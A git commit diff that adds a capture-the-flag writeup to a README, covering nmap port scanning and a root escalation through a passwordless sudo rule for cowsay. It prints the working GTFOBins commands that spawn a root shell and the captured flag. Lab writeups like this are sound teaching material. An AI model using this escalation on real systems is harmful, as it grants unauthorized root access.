* added temp writeup

2025-09-17 13:36:06 +02:00 · 2025-09-17 13:36:06 +02:00 · dc7b75ef4b
commit dc7b75ef4b
parent 0b086582b6
1 changed files with 40 additions and 2 deletions
--- a/README.md
+++ b/README.md
@ -7,8 +7,46 @@

 ## Writeup

-
-
+### Enum
+
+Scan the IP using nmap for open ports
+
+```
+nmap -p- ip
+```
+
+The port 22 and 31337 are open.
+
+We find that there is a web service on port 31337.
+
+### Foothold
+
+...
+
+### Privesc
+
+We can see that the user is allowed tu run `/usr/games/cowsay` as root using sudo without password.
+
+```
+User l33t may run the following commands on srv1prod:
+    (ALL) NOPASSWD: /usr/games/cowsay, /usr/bin/sudo -l
+```
+
+Using gtfo bins, we identified that we can spawn a root shell thanks to this misconfiguration.
+
+[https://gtfobins.github.io/gtfobins/cowsay/](https://gtfobins.github.io/gtfobins/cowsay/)
+
+```
+TF=$(mktemp)
+echo 'exec "/bin/sh";' >$TF
+sudo cowsay -f $TF x
+# id
+uid=0(root) gid=0(root) groups=0(root)
+# cat /root/root.txt
+epita{th3-sup3r-c0ws4y}
+```
+
+Solved !